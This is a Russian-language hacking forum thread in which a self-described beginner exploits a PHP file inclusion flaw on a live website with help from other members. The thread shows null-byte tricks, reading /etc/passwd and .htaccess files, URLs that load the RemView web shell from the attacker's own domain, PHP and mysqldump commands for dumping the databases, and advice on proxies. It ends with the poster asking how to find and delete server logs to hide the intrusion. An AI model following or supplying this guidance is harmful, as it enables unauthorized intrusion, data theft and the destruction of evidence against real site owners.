отредактировал. Вдруг их адним тоже на античат вздумает зайти :)

Начнем с того что в старых версиях ПХП возможно использовать NULL-BYTE.
Тоесть чтобы экранировать .txt можно использовать %00
Во вторых, чтоже можно сделать чтением файлов?
Для начала попробуй прочитать /etc/passwd. В 5% случаев их можно читать =)

Далее. Прочитай и сохрани /etc/passwd. Он даст список юзеров.

Далее. Попробуй найти на сайте HTTP-passwd-like файлы типа .htpassword .htaccess и т д. И ещё попробуй найти зоны администрирования (наверняка же есть чтото) и прочитать скрипт, содержащий логин и пароль.

Ну в прибавок могу отписать, что судя по ошибке, параметр 'a' возможно не фильтрует входящие данные, что может позволить инклудинг и запуск файла, тоесть любой php код, сохраненный в текстовом файле вероятно запуститса на сервере...это тока теоретическое суждение, верно ли или нет сказать не могу.

не известно одно, можно ли эксплуатировать уязвимость удаленно, уже ясно что локально можно..
Попрпбуй добавь к параметру 'a' http:// еси от фильтрует, то значит ток локально.

так и есть - любой РНР код который записан в текстовике потом обрабатывается через index.php и выполняется как РНР,
Залил ремвью через форум, только незнаю в какой папке лежит.
+ там же файл переименовывается. Форум Инвижен 2.0 )

ай-ай-ай! запустился ремвью из удаленного адреса! ненавижу удаффский сленг, но "РЖУНИМАГУ" :)

Народ, теперь такой вопросец:
я можно сказать - начинающий. и работаю даже не через проксю :) Посоветуйте что мне прочитать как себя обезопасить от уголовной отвественности. :)

хех.. рано обрадовался:

ремвью запускаю так:

http://victim.com/index.php?a=http://moydomen.ru/remview

запускается ремвью, но все ссылки в нем такого вида:
http://victim.com/index.php?&c=v&d=d%3A%2Fsite%2Fwww%2F&f=about.txt

вообщем мне ремвью только смог показать какие там папки, но ничего просмотреть и скачать я не смогу... хотя может я чтото непонимаю?

в любом случае остается возможность запуска любого Мускульного кода.
Подскажите, пожалуйста, - какой командой можно просмотреть структуру базы данных?

ой немогу :) нормально ремвью работает, просто нужно добавлять параметры так

http://victim.com/index.php?a=http://moydomen.ru/remview&&c=l&d=d%3A%2Fsite%2Fwww%2Fadmin

ну похвально, сам находишь ответы =)

а по поводу моей анонимности, подскажите пожалуйста.

и по поводу просмотра структуры БД ;)

найди живые прокси сервера.
для чтение данных в базе, найди конфиг файлы, которые могут содержать логин/пасс к базе.
Залей в папку открытой для записи, скрипт для входа в базу, например у Rst, и воспльзовавшись им, используй данные с конфиг файлов...и вё будет тебе база перед глазами.

Ps: у Rst новый веб-шелл содержит все в одном, и шелл, и модуль для входа в базу. Ток на врядли ты там разберещься =)...Эт тебе не ремвью

Посоветуйте что мне прочитать как себя обезопасить от уголовной отвественности. :)


Почитай отца своего .

Шутка


для начала Прочитай УК РФ ст.272 . 273

Потом это http://antichat.ru/txt/old/ip.shtml

затем это http://antichat.ru/txt/old/anonumus.shtml

Анонимность? - без комментариев

Просмотр базы - берешь тот же ремвью и выполняешь код PHP

mysql_connect(...)
$r = mysql_query("SHOW DATABASES");
$a = mysql_fetch_array($r);
foreach($a as $a1) print $a1."\r\n"

если не очепятался. и потом тоже для таблиц - SHOW TABLES

а потом легче так
$ mysqldump --help
и ты получил список параметров.
mysqldump -u user -p --all-databases > dump.sql

Мда, тамвообщем такая фишка - я получил полностью контроль на домпом сервера :) Лажу себе по папкам :)
Подскажите - где логи смотреть? удалю наф свои заходы..
Заш1л на апачевский error.log - нет ничего.

шелл от RST - супер! )

Но всеравно не могу найти где логи :( Помогите ,пожалуйста